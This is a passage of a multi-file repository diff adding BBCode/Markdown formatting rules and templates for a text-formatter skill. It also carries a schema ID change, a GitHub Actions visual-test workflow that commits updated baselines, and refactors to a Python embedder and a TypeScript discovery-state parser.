| example | #9C27B0 | 📋 | 示例 |
|
||||
| question | #FF9800 | ❓ | 问题 |
|
||||
| help | #FF9800 | ❓ | 帮助 |
|
||||
| faq | #FF9800 | ❓ | FAQ |
|
||||
| quote | gray | 💬 | 引用 |
|
||||
| cite | gray | 💬 | 引用 |
|
||||
| abstract | #2196F3 | 📄 | 摘要 |
|
||||
| summary | #2196F3 | 📄 | 摘要 |
|
||||
| tldr | #2196F3 | 📄 | 摘要 |
|
||||
| todo | #FF9800 | 📋 | 待办 |
|
||||
| important | #F44336 | ⭐ | 重要 |
|
||||
|
||||
### Callout 输出模板
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color={color}][b]{icon} {title}[/b][/color][/size]
|
||||
|
||||
{content}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Unsupported Elements
|
||||
|
||||
### 不支持转换的元素
|
||||
|
||||
| 元素 | 原因 | 降级方案 |
|
||||
|------|------|----------|
|
||||
| 表格 | BBCode 表格支持有限 | 转为代码块或列表 |
|
||||
| 脚注 | 不支持 | 转为括号注释 `(注: ...)` |
|
||||
| 数学公式 | 不支持 | 保留原始文本 |
|
||||
| 嵌入内容 | 不支持 | 转为链接 |
|
||||
| 任务列表 | 复选框不支持 | 转为普通列表 `☐`/`☑` |
|
||||
|
||||
### 降级示例
|
||||
|
||||
**表格**:
|
||||
```
|
||||
| A | B |
|
||||
|---|---|
|
||||
| 1 | 2 |
|
||||
|
||||
→ 降级为:
|
||||
|
||||
A: 1
|
||||
B: 2
|
||||
```
|
||||
|
||||
**脚注**:
|
||||
```
|
||||
文本[^1]
|
||||
|
||||
[^1]: 脚注内容
|
||||
|
||||
→ 降级为:
|
||||
|
||||
文本 (注: 脚注内容)
|
||||
```
|
||||
|
||||
**任务列表**:
|
||||
```
|
||||
- [ ] 待办
|
||||
- [x] 已完成
|
||||
|
||||
→ 降级为:
|
||||
|
||||
☐ 待办
|
||||
☑ 已完成
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Validation Rules
|
||||
|
||||
### 转换验证
|
||||
|
||||
- [ ] 所有 H1-H3 使用像素值 size (150/120/100)
|
||||
- [ ] 未使用 `[align]` 标签
|
||||
- [ ] 未使用 `[hr]` 标签
|
||||
- [ ] 分隔线保持 `---`
|
||||
- [ ] Callout 正确识别并转换
|
||||
- [ ] 颜色值使用 hex 格式
|
||||
273
.claude/skills/text-formatter/specs/format-rules.md
Normal file
@@ -0,0 +1,273 @@
|
||||
# Format Conversion Rules
|
||||
|
||||
BBCode + Markdown 混合格式转换规则(论坛优化)。
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| Phase 3 | 格式转换 | All sections |
|
||||
|
||||
---
|
||||
|
||||
## Core Principles
|
||||
|
||||
### 1. Pixel-Based Sizing
|
||||
|
||||
**重要**: 使用像素值而非 1-7 级别
|
||||
|
||||
| 元素 | Size (px) | 说明 |
|
||||
|------|-----------|------|
|
||||
| 主标题 (H1) | 150 | 文档标题 |
|
||||
| 章节标题 (H2) | 120 | 主要章节 |
|
||||
| 子标题 (H3) | 100 | 子章节 |
|
||||
| 正文 | (默认) | 不指定 size |
|
||||
| 备注/灰色 | 80 | 脚注、元数据 |
|
||||
|
||||
### 2. Supported Tags Only
|
||||
|
||||
**支持的 BBCode 标签**:
|
||||
- `[size=N]` - 字号(像素值)
|
||||
- `[color=X]` - 颜色(hex 或名称,如 `[color=blue]`、`[color=#2196F3]`)
|
||||
- `[b]`, `[i]`, `[s]`, `[u]` - 粗体、斜体、删除线、下划线
|
||||
- `[quote]` - 引用块
|
||||
- `[code]` - 代码块
|
||||
- `[url]`, `[img]` - 链接、图片
|
||||
- `[list]`, `[*]` - 列表
|
||||
- `[spoiler]` 或 `[spoiler=标题]` - 折叠/隐藏内容
|
||||
|
||||
**禁止使用的标签**:
|
||||
- `[align]` - 不渲染,显示为文本
|
||||
- `[hr]` - 不渲染,使用 Markdown `---`
|
||||
- `[table]` - 支持有限,避免使用
|
||||
|
||||
**HTML 标签转换** (输入时支持,转换为 BBCode):
|
||||
- `<mark>text</mark>` → `[color=yellow]text[/color]`
|
||||
- `<details><summary>标题</summary>内容</details>` → `[spoiler=标题]内容[/spoiler]`
|
||||
- 其他 HTML 标签 (`<div>`, `<span>`) - 删除
|
||||
|
||||
### 3. Markdown as Separator
|
||||
|
||||
分隔线使用 Markdown 语法:`---`
|
||||
|
||||
---
|
||||
|
||||
## Element Conversion Rules
|
||||
|
||||
### 标题转换
|
||||
|
||||
| Markdown | BBCode Output |
|
||||
|----------|---------------|
|
||||
| `# H1` | `[size=150][color=#2196F3][b]H1[/b][/color][/size]` |
|
||||
| `## H2` | `[size=120][color=#2196F3][b]H2[/b][/color][/size]` |
|
||||
| `### H3` | `[size=100][color=#333][b]H3[/b][/color][/size]` |
|
||||
| `#### H4+` | `[b]H4[/b]` (不加 size) |
|
||||
|
||||
### 文本样式
|
||||
|
||||
| Markdown/HTML | BBCode |
|
||||
|---------------|--------|
|
||||
| `**bold**` 或 `__bold__` | `[b]bold[/b]` |
|
||||
| `*italic*` 或 `_italic_` | `[i]italic[/i]` |
|
||||
| `***both***` | `[b][i]both[/i][/b]` |
|
||||
| `~~strike~~` | `[s]strike[/s]` |
|
||||
| `==highlight==` 或 `<mark>text</mark>` | `[color=yellow]highlight[/color]` |
|
||||
| (无 MD 语法) | `[u]underline[/u]` |
|
||||
|
||||
### 折叠内容
|
||||
|
||||
| HTML | BBCode |
|
||||
|------|--------|
|
||||
| `<details><summary>标题</summary>内容</details>` | `[spoiler=标题]内容[/spoiler]` |
|
||||
| (无 HTML) | `[spoiler]隐藏内容[/spoiler]` |
|
||||
|
||||
### 代码
|
||||
|
||||
| Markdown | BBCode |
|
||||
|----------|--------|
|
||||
| `` `inline` `` | 保持原样或 `[color=#9C27B0]inline[/color]` |
|
||||
| ` ```code``` ` | `[code]code[/code]` |
|
||||
|
||||
### 链接和图片
|
||||
|
||||
| Markdown | BBCode |
|
||||
|----------|--------|
|
||||
| `[text](url)` | `[url=url]text[/url]` |
|
||||
| `![alt](url)` | `[img]url[/img]` |
|
||||
|
||||
### 列表
|
||||
|
||||
```
|
||||
Markdown:
|
||||
- item 1
|
||||
- item 2
|
||||
- nested
|
||||
|
||||
BBCode:
|
||||
• item 1
|
||||
• item 2
|
||||
• nested
|
||||
```
|
||||
|
||||
注意:使用 `•` 符号而非 `[list][*]`,因为部分论坛渲染有问题。
|
||||
|
||||
### 引用
|
||||
|
||||
```
|
||||
Markdown:
|
||||
> quote text
|
||||
|
||||
BBCode:
|
||||
[quote]
|
||||
quote text
|
||||
[/quote]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Callout (标注) 转换
|
||||
|
||||
### Obsidian Callout 语法
|
||||
|
||||
```markdown
|
||||
> [!TYPE] 可选标题
|
||||
> 内容行 1
|
||||
> 内容行 2
|
||||
```
|
||||
|
||||
### 支持的 Callout 类型
|
||||
|
||||
| Type | Color | Icon | 中文标签 |
|
||||
|------|-------|------|----------|
|
||||
| note, info | #2196F3 | 📝 | 注意 / 信息 |
|
||||
| tip, hint | #4CAF50 | 💡 | 提示 |
|
||||
| success, check, done | #4CAF50 | ✅ | 成功 |
|
||||
| warning, caution, attention | #FF9800 | ⚠️ | 警告 |
|
||||
| danger, error, bug | #F44336 | ❌ | 危险 / 错误 |
|
||||
| example | #9C27B0 | 📋 | 示例 |
|
||||
| question, help, faq | #FF9800 | ❓ | 问题 |
|
||||
| quote, cite | gray | 💬 | 引用 |
|
||||
| abstract, summary, tldr | #2196F3 | 📄 | 摘要 |
|
||||
|
||||
### Callout 转换模板
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color={color}][b]{icon} {title}[/b][/color][/size]
|
||||
|
||||
{content}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
**示例**:
|
||||
|
||||
```markdown
|
||||
> [!WARNING] 注意事项
|
||||
> 这是警告内容
|
||||
```
|
||||
|
||||
转换为:
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#FF9800][b]⚠️ 注意事项[/b][/color][/size]
|
||||
|
||||
这是警告内容
|
||||
[/quote]
|
||||
```
|
||||
|
||||
### 可折叠 Callout
|
||||
|
||||
Obsidian 支持 `> [!NOTE]+` (展开) 和 `> [!NOTE]-` (折叠)。
|
||||
|
||||
由于 BBCode 不支持折叠,统一转换为普通 quote。
|
||||
|
||||
---
|
||||
|
||||
## Color Palette
|
||||
|
||||
### 语义颜色
|
||||
|
||||
| 语义 | Hex | 使用场景 |
|
||||
|------|-----|----------|
|
||||
| Primary | #2196F3 | 标题、链接、信息 |
|
||||
| Success | #4CAF50 | 成功、提示、特性 |
|
||||
| Warning | #FF9800 | 警告、注意 |
|
||||
| Error | #F44336 | 错误、危险 |
|
||||
| Purple | #9C27B0 | 示例、代码 |
|
||||
| Gray | gray | 备注、元数据 |
|
||||
| Dark | #333 | 子标题 |
|
||||
|
||||
### 颜色使用规则
|
||||
|
||||
1. **标题颜色**: H1/H2 使用 #2196F3,H3 使用 #333
|
||||
2. **Callout 颜色**: 根据类型使用语义颜色
|
||||
3. **备注颜色**: 使用 gray
|
||||
4. **强调颜色**: 根据语义选择(成功用绿色,警告用橙色)
|
||||
|
||||
---
|
||||
|
||||
## Spacing Rules
|
||||
|
||||
### 空行控制
|
||||
|
||||
| 元素 | 前空行 | 后空行 |
|
||||
|------|--------|--------|
|
||||
| 标题 | 1 | 1 |
|
||||
| 段落 | 0 | 1 |
|
||||
| 列表 | 0 | 1 |
|
||||
| 代码块 | 1 | 1 |
|
||||
| Callout | 1 | 1 |
|
||||
| 分隔线 `---` | 1 | 1 |
|
||||
|
||||
### 示例输出结构
|
||||
|
||||
```bbcode
|
||||
[size=150][color=#2196F3][b]文档标题[/b][/color][/size]
|
||||
|
||||
[size=80][color=gray]作者 | 日期[/color][/size]
|
||||
|
||||
---
|
||||
|
||||
[size=120][color=#2196F3][b]第一章节[/b][/color][/size]
|
||||
|
||||
正文内容...
|
||||
|
||||
[quote]
|
||||
[size=100][color=#4CAF50][b]💡 提示[/b][/color][/size]
|
||||
|
||||
提示内容
|
||||
[/quote]
|
||||
|
||||
---
|
||||
|
||||
[size=120][color=#2196F3][b]第二章节[/b][/color][/size]
|
||||
|
||||
更多内容...
|
||||
|
||||
---
|
||||
|
||||
[size=80][color=gray]— 全文完 —[/color][/size]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Quality Checklist
|
||||
|
||||
### 转换完整性
|
||||
|
||||
- [ ] 所有标题使用像素值 size
|
||||
- [ ] 未使用 `[align]` 或 `[hr]`
|
||||
- [ ] 分隔线使用 `---`
|
||||
- [ ] Callout 正确转换为 quote
|
||||
- [ ] 颜色符合语义规范
|
||||
- [ ] 空行控制正确
|
||||
|
||||
### 常见错误
|
||||
|
||||
| 错误 | 正确做法 |
|
||||
|------|----------|
|
||||
| `[size=5]` | `[size=120]` |
|
||||
| `[align=center]` | 删除,默认左对齐 |
|
||||
| `[hr]` | 使用 `---` |
|
||||
| `<div class="...">` | 删除 HTML 标签 |
|
||||
350
.claude/skills/text-formatter/templates/bbcode-template.md
Normal file
@@ -0,0 +1,350 @@
|
||||
# BBCode Template
|
||||
|
||||
论坛优化的 BBCode + Markdown 混合模板(像素级字号)。
|
||||
|
||||
## 核心规则
|
||||
|
||||
### 字号体系 (Pixels)
|
||||
|
||||
| 元素 | Size | 说明 |
|
||||
|------|------|------|
|
||||
| 主标题 | 150 | 文档标题 |
|
||||
| 章节标题 | 120 | H2 级别 |
|
||||
| 子标题 | 100 | H3 级别 |
|
||||
| 正文 | (默认) | 不指定 |
|
||||
| 备注 | 80 | 灰色小字 |
|
||||
|
||||
### 禁止使用
|
||||
|
||||
- `[align]` - 不渲染
|
||||
- `[hr]` - 不渲染,用 `---`
|
||||
- `[table]` - 支持有限
|
||||
- HTML 标签
|
||||
|
||||
---
|
||||
|
||||
## 文档模板
|
||||
|
||||
### 基础文档结构
|
||||
|
||||
```bbcode
|
||||
[size=150][color=#2196F3][b]{{title}}[/b][/color][/size]
|
||||
|
||||
[size=80][color=gray]{{metadata}}[/color][/size]
|
||||
|
||||
---
|
||||
|
||||
{{introduction}}
|
||||
|
||||
---
|
||||
|
||||
[size=120][color=#2196F3][b]{{section1_title}}[/b][/color][/size]
|
||||
|
||||
{{section1_content}}
|
||||
|
||||
---
|
||||
|
||||
[size=120][color=#2196F3][b]{{section2_title}}[/b][/color][/size]
|
||||
|
||||
{{section2_content}}
|
||||
|
||||
---
|
||||
|
||||
[size=80][color=gray]— 全文完 —[/color][/size]
|
||||
```
|
||||
|
||||
### 带目录的文档
|
||||
|
||||
```bbcode
|
||||
[size=150][color=#2196F3][b]{{title}}[/b][/color][/size]
|
||||
|
||||
[size=80][color=gray]{{author}} | {{date}}[/color][/size]
|
||||
|
||||
---
|
||||
|
||||
[size=100][b]📋 目录[/b][/size]
|
||||
|
||||
• {{section1_title}}
|
||||
• {{section2_title}}
|
||||
• {{section3_title}}
|
||||
|
||||
---
|
||||
|
||||
[size=120][color=#2196F3][b]{{section1_title}}[/b][/color][/size]
|
||||
|
||||
{{section1_content}}
|
||||
|
||||
---
|
||||
|
||||
[size=120][color=#2196F3][b]{{section2_title}}[/b][/color][/size]
|
||||
|
||||
{{section2_content}}
|
||||
|
||||
---
|
||||
|
||||
[size=120][color=#2196F3][b]{{section3_title}}[/b][/color][/size]
|
||||
|
||||
{{section3_content}}
|
||||
|
||||
---
|
||||
|
||||
[size=80][color=gray]— 全文完 —[/color][/size]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Callout 模板
|
||||
|
||||
### 提示 (Note/Info)
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#2196F3][b]📝 {{title}}[/b][/color][/size]
|
||||
|
||||
{{content}}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
### 技巧 (Tip/Hint)
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#4CAF50][b]💡 {{title}}[/b][/color][/size]
|
||||
|
||||
{{content}}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
### 成功 (Success)
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#4CAF50][b]✅ {{title}}[/b][/color][/size]
|
||||
|
||||
{{content}}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
### 警告 (Warning/Caution)
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#FF9800][b]⚠️ {{title}}[/b][/color][/size]
|
||||
|
||||
{{content}}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
### 危险/错误 (Danger/Error)
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#F44336][b]❌ {{title}}[/b][/color][/size]
|
||||
|
||||
{{content}}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
### 示例 (Example)
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#9C27B0][b]📋 {{title}}[/b][/color][/size]
|
||||
|
||||
{{content}}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
### 问题 (Question/FAQ)
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#FF9800][b]❓ {{title}}[/b][/color][/size]
|
||||
|
||||
{{content}}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
### 重要 (Important)
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#F44336][b]⭐ {{title}}[/b][/color][/size]
|
||||
|
||||
{{content}}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 代码展示模板
|
||||
|
||||
### 单代码块
|
||||
|
||||
```bbcode
|
||||
[size=100][color=#9C27B0][b]代码示例[/b][/color][/size]
|
||||
|
||||
[code]
|
||||
{{code}}
|
||||
[/code]
|
||||
|
||||
[size=80][color=gray]说明: {{description}}[/color][/size]
|
||||
```
|
||||
|
||||
### 带标题的代码
|
||||
|
||||
```bbcode
|
||||
[size=100][b]{{code_title}}[/b][/size]
|
||||
|
||||
[code]
|
||||
{{code}}
|
||||
[/code]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 特性展示模板
|
||||
|
||||
### 特性列表
|
||||
|
||||
```bbcode
|
||||
[size=120][color=#2196F3][b]功能特性[/b][/color][/size]
|
||||
|
||||
• [color=#4CAF50][b]✨ {{feature1}}[/b][/color] — {{desc1}}
|
||||
• [color=#2196F3][b]🚀 {{feature2}}[/b][/color] — {{desc2}}
|
||||
• [color=#FF9800][b]⚡ {{feature3}}[/b][/color] — {{desc3}}
|
||||
```
|
||||
|
||||
### 详细特性卡片
|
||||
|
||||
```bbcode
|
||||
[size=120][color=#2196F3][b]功能特性[/b][/color][/size]
|
||||
|
||||
[quote]
|
||||
[size=100][color=#4CAF50][b]✨ {{feature1_title}}[/b][/color][/size]
|
||||
|
||||
{{feature1_description}}
|
||||
|
||||
[size=80][color=gray]适用场景: {{feature1_use_case}}[/color][/size]
|
||||
[/quote]
|
||||
|
||||
[quote]
|
||||
[size=100][color=#2196F3][b]🚀 {{feature2_title}}[/b][/color][/size]
|
||||
|
||||
{{feature2_description}}
|
||||
|
||||
[size=80][color=gray]适用场景: {{feature2_use_case}}[/color][/size]
|
||||
[/quote]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 步骤指南模板
|
||||
|
||||
```bbcode
|
||||
[size=120][color=#2196F3][b]操作步骤[/b][/color][/size]
|
||||
|
||||
[size=100][color=#2196F3][b]步骤 1: {{step1_title}}[/b][/color][/size]
|
||||
|
||||
{{step1_content}}
|
||||
|
||||
[quote]
|
||||
[size=100][color=#FF9800][b]💡 提示[/b][/color][/size]
|
||||
|
||||
{{step1_tip}}
|
||||
[/quote]
|
||||
|
||||
[size=100][color=#2196F3][b]步骤 2: {{step2_title}}[/b][/color][/size]
|
||||
|
||||
{{step2_content}}
|
||||
|
||||
[size=100][color=#2196F3][b]步骤 3: {{step3_title}}[/b][/color][/size]
|
||||
|
||||
{{step3_content}}
|
||||
|
||||
---
|
||||
|
||||
[color=#4CAF50][b]✅ 完成![/b][/color] {{completion_message}}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 版本更新模板
|
||||
|
||||
```bbcode
|
||||
[size=150][color=#673AB7][b]🎉 版本 {{version}} 更新日志[/b][/color][/size]
|
||||
|
||||
---
|
||||
|
||||
[size=120][color=#4CAF50][b]✨ 新功能[/b][/color][/size]
|
||||
|
||||
• [b]{{new_feature1}}[/b]: {{new_feature1_desc}}
|
||||
• [b]{{new_feature2}}[/b]: {{new_feature2_desc}}
|
||||
|
||||
[size=120][color=#2196F3][b]🔧 改进[/b][/color][/size]
|
||||
|
||||
• {{improvement1}}
|
||||
• {{improvement2}}
|
||||
|
||||
[size=120][color=#F44336][b]🐛 修复[/b][/color][/size]
|
||||
|
||||
• {{bugfix1}}
|
||||
• {{bugfix2}}
|
||||
|
||||
---
|
||||
|
||||
[url={{download_url}}][b]📥 立即下载[/b][/url]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## FAQ 模板
|
||||
|
||||
```bbcode
|
||||
[size=120][color=#2196F3][b]❓ 常见问题[/b][/color][/size]
|
||||
|
||||
---
|
||||
|
||||
[size=100][color=#333][b]Q: {{question1}}[/b][/color][/size]
|
||||
|
||||
[b]A:[/b] {{answer1}}
|
||||
|
||||
---
|
||||
|
||||
[size=100][color=#333][b]Q: {{question2}}[/b][/color][/size]
|
||||
|
||||
[b]A:[/b] {{answer2}}
|
||||
|
||||
---
|
||||
|
||||
[size=100][color=#333][b]Q: {{question3}}[/b][/color][/size]
|
||||
|
||||
[b]A:[/b] {{answer3}}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 转换检查清单
|
||||
|
||||
### 必须检查
|
||||
|
||||
- [ ] 标题使用像素值 (150/120/100)
|
||||
- [ ] 分隔线使用 `---`
|
||||
- [ ] 未使用 `[align]`
|
||||
- [ ] 未使用 `[hr]`
|
||||
- [ ] 未使用 HTML 标签
|
||||
- [ ] Callout 标题 size=100
|
||||
- [ ] 灰色备注 size=80
|
||||
|
||||
### 颜色规范
|
||||
|
||||
| 用途 | 颜色 |
|
||||
|------|------|
|
||||
| 主标题 | #2196F3 |
|
||||
| 章节标题 | #2196F3 |
|
||||
| 子标题 | #333 |
|
||||
| 成功/提示 | #4CAF50 |
|
||||
| 警告 | #FF9800 |
|
||||
| 错误/危险 | #F44336 |
|
||||
| 示例 | #9C27B0 |
|
||||
| 备注 | gray |
|
||||
@@ -7,9 +7,9 @@
|
||||
"properties": {
|
||||
"id": {
|
||||
"type": "string",
|
||||
"description": "Unique solution identifier: SOL-{issue-id}-{seq}",
|
||||
"pattern": "^SOL-.+-[0-9]+$",
|
||||
"examples": ["SOL-GH-123-1", "SOL-ISS-20251229-1"]
|
||||
"description": "Unique solution identifier: SOL-{issue-id}-{4-char-uid} where uid is 4 alphanumeric chars",
|
||||
"pattern": "^SOL-.+-[a-z0-9]{4}$",
|
||||
"examples": ["SOL-GH-123-a7x9", "SOL-ISS-20251229-001-b2k4"]
|
||||
},
|
||||
"description": {
|
||||
"type": "string",
|
||||
|
||||
@@ -444,6 +444,11 @@ EOF
|
||||
- `docs`: Documentation changes
|
||||
- `chore`: Maintenance tasks
|
||||
|
||||
**Commit Language**:
|
||||
- Use **Chinese** commit summary if project's `CLAUDE.md` specifies Chinese response guidelines or user explicitly requests Chinese
|
||||
- Use **English** commit summary by default or when project targets international collaboration
|
||||
- Check project's existing commit history for language convention consistency
|
||||
|
||||
**Output format:**
|
||||
```
|
||||
## Solution Committed: [solution_id]
|
||||
|
||||
24
.github/workflows/visual-tests.yml
vendored
@@ -1,11 +1,21 @@
|
||||
name: Visual Regression Tests
|
||||
|
||||
on:
|
||||
workflow_dispatch:
|
||||
inputs:
|
||||
update_baselines:
|
||||
description: 'Update baseline snapshots'
|
||||
required: false
|
||||
default: 'false'
|
||||
type: boolean
|
||||
pull_request:
|
||||
push:
|
||||
branches:
|
||||
- main
|
||||
|
||||
permissions:
|
||||
contents: write
|
||||
|
||||
jobs:
|
||||
visual-tests:
|
||||
runs-on: ubuntu-latest
|
||||
@@ -14,6 +24,8 @@ jobs:
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v4
|
||||
with:
|
||||
token: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
||||
- name: Setup Node.js
|
||||
uses: actions/setup-node@v4
|
||||
@@ -29,6 +41,18 @@ jobs:
|
||||
|
||||
- name: Run visual tests
|
||||
run: npm run test:visual
|
||||
env:
|
||||
CI: true
|
||||
CCW_VISUAL_UPDATE_BASELINE: ${{ inputs.update_baselines && '1' || '0' }}
|
||||
|
||||
- name: Commit updated baselines
|
||||
if: inputs.update_baselines == true
|
||||
run: |
|
||||
git config --local user.email "github-actions[bot]@users.noreply.github.com"
|
||||
git config --local user.name "github-actions[bot]"
|
||||
git add ccw/tests/visual/snapshots/baseline/
|
||||
git diff --staged --quiet || git commit -m "chore: update visual test baselines [skip ci]"
|
||||
git push
|
||||
|
||||
- name: Upload visual artifacts on failure
|
||||
if: failure()
|
||||
|
||||
@@ -26,7 +26,9 @@ except ImportError:
|
||||
sys.exit(1)
|
||||
|
||||
try:
|
||||
from codexlens.semantic.embedder import get_embedder, clear_embedder_cache
|
||||
from codexlens.semantic.factory import get_embedder as get_embedder_factory
|
||||
from codexlens.semantic.factory import clear_embedder_cache
|
||||
from codexlens.config import Config as CodexLensConfig
|
||||
except ImportError:
|
||||
print("Error: CodexLens not found. Install with: pip install codexlens[semantic]", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
@@ -35,8 +37,6 @@ except ImportError:
|
||||
class MemoryEmbedder:
|
||||
"""Generate and search embeddings for memory chunks."""
|
||||
|
||||
EMBEDDING_DIM = 768 # jina-embeddings-v2-base-code dimension
|
||||
|
||||
def __init__(self, db_path: str):
|
||||
"""Initialize embedder with database path."""
|
||||
self.db_path = Path(db_path)
|
||||
@@ -46,14 +46,61 @@ class MemoryEmbedder:
|
||||
self.conn = sqlite3.connect(str(self.db_path))
|
||||
self.conn.row_factory = sqlite3.Row
|
||||
|
||||
# Load CodexLens configuration for embedding settings
|
||||
try:
|
||||
self._config = CodexLensConfig.load()
|
||||
except Exception as e:
|
||||
print(f"Warning: Could not load CodexLens config, using defaults. Error: {e}", file=sys.stderr)
|
||||
self._config = CodexLensConfig() # Use default config
|
||||
|
||||
# Lazy-load embedder to avoid ~0.8s model loading for status command
|
||||
self._embedder = None
|
||||
self._embedding_dim = None
|
||||
|
||||
@property
|
||||
def embedding_dim(self) -> int:
|
||||
"""Get embedding dimension from the embedder."""
|
||||
if self._embedding_dim is None:
|
||||
# Access embedder to get its dimension
|
||||
self._embedding_dim = self.embedder.embedding_dim
|
||||
return self._embedding_dim
|
||||
|
||||
@property
|
||||
def embedder(self):
|
||||
"""Lazy-load the embedder on first access."""
|
||||
"""Lazy-load the embedder on first access using CodexLens config."""
|
||||
if self._embedder is None:
|
||||
self._embedder = get_embedder(profile="code")
|
||||
# Use CodexLens configuration settings
|
||||
backend = self._config.embedding_backend
|
||||
model = self._config.embedding_model
|
||||
use_gpu = self._config.embedding_use_gpu
|
||||
|
||||
# Use factory to create embedder based on backend type
|
||||
if backend == "fastembed":
|
||||
self._embedder = get_embedder_factory(
|
||||
backend="fastembed",
|
||||
profile=model,
|
||||
use_gpu=use_gpu
|
||||
)
|
||||
elif backend == "litellm":
|
||||
# For litellm backend, also pass endpoints if configured
|
||||
endpoints = self._config.embedding_endpoints
|
||||
strategy = self._config.embedding_strategy
|
||||
cooldown = self._config.embedding_cooldown
|
||||
|
||||
self._embedder = get_embedder_factory(
|
||||
backend="litellm",
|
||||
model=model,
|
||||
endpoints=endpoints if endpoints else None,
|
||||
strategy=strategy,
|
||||
cooldown=cooldown,
|
||||
)
|
||||
else:
|
||||
# Fallback to fastembed with code profile
|
||||
self._embedder = get_embedder_factory(
|
||||
backend="fastembed",
|
||||
profile="code",
|
||||
use_gpu=True
|
||||
)
|
||||
return self._embedder
|
||||
|
||||
def close(self):
|
||||
|
||||
@@ -1344,4 +1344,4 @@ export function getAvailableModelsForType(
|
||||
}
|
||||
|
||||
// Re-export types
|
||||
export type { ProviderCredential, CustomEndpoint, ProviderType, CacheStrategy, CodexLensEmbeddingRotation, CodexLensEmbeddingProvider, EmbeddingPoolConfig, RotationEndpointConfig };
|
||||
export type { ProviderCredential, CustomEndpoint, ProviderType, CacheStrategy, CodexLensEmbeddingRotation, CodexLensEmbeddingProvider, EmbeddingPoolConfig };
|
||||
|
||||
@@ -60,12 +60,30 @@ function readDiscoveryIndex(discoveriesDir: string): { discoveries: any[]; total
|
||||
if (existsSync(statePath)) {
|
||||
try {
|
||||
const state = JSON.parse(readFileSync(statePath, 'utf8'));
|
||||
|
||||
// Extract perspectives - handle both old and new formats
|
||||
let perspectives: string[] = [];
|
||||
if (state.perspectives && Array.isArray(state.perspectives)) {
|
||||
// New format: string array or old format: object array
|
||||
if (state.perspectives.length > 0 && typeof state.perspectives[0] === 'object') {
|
||||
perspectives = state.perspectives.map((p: any) => p.name || p.perspective || '');
|
||||
} else {
|
||||
perspectives = state.perspectives;
|
||||
}
|
||||
} else if (state.metadata?.perspectives) {
|
||||
// Legacy format
|
||||
perspectives = state.metadata.perspectives;
|
||||
}
|
||||
|
||||
// Extract created_at - handle both formats
|
||||
const created_at = state.created_at || state.metadata?.created_at;
|
||||
|
||||
discoveries.push({
|
||||
discovery_id: entry.name,
|
||||
target_pattern: state.target_pattern,
|
||||
perspectives: state.metadata?.perspectives || [],
|
||||
created_at: state.metadata?.created_at,
|
||||
completed_at: state.completed_at
|
||||
perspectives,
|
||||
created_at,
|
||||
completed_at: state.completed_at || state.updated_at
|
||||
});
|
||||
} catch {
|
||||
// Skip invalid entries
|
||||
@@ -110,29 +128,71 @@ function readDiscoveryProgress(discoveriesDir: string, discoveryId: string): any
|
||||
if (existsSync(statePath)) {
|
||||
try {
|
||||
const state = JSON.parse(readFileSync(statePath, 'utf8'));
|
||||
// New merged schema: perspectives array + results object
|
||||
|
||||
// Check if perspectives is an array
|
||||
if (state.perspectives && Array.isArray(state.perspectives)) {
|
||||
const completed = state.perspectives.filter((p: any) => p.status === 'completed').length;
|
||||
const total = state.perspectives.length;
|
||||
return {
|
||||
discovery_id: discoveryId,
|
||||
phase: state.phase,
|
||||
last_update: state.updated_at || state.created_at,
|
||||
progress: {
|
||||
perspective_analysis: {
|
||||
total,
|
||||
completed,
|
||||
in_progress: state.perspectives.filter((p: any) => p.status === 'in_progress').length,
|
||||
percent_complete: total > 0 ? Math.round((completed / total) * 100) : 0
|
||||
// Detect format: object array (old) vs string array (new)
|
||||
const isObjectArray = state.perspectives.length > 0 && typeof state.perspectives[0] === 'object';
|
||||
|
||||
if (isObjectArray) {
|
||||
// Old merged schema: perspectives is array of objects with status
|
||||
const completed = state.perspectives.filter((p: any) => p.status === 'completed').length;
|
||||
const total = state.perspectives.length;
|
||||
return {
|
||||
discovery_id: discoveryId,
|
||||
phase: state.phase,
|
||||
last_update: state.updated_at || state.created_at,
|
||||
progress: {
|
||||
perspective_analysis: {
|
||||
total,
|
||||
completed,
|
||||
in_progress: state.perspectives.filter((p: any) => p.status === 'in_progress').length,
|
||||
percent_complete: total > 0 ? Math.round((completed / total) * 100) : 0
|
||||
},
|
||||
external_research: state.external_research || { enabled: false, completed: false },
|
||||
aggregation: { completed: state.phase === 'aggregation' || state.phase === 'complete' },
|
||||
issue_generation: { completed: state.phase === 'complete', issues_count: state.results?.issues_generated || 0 }
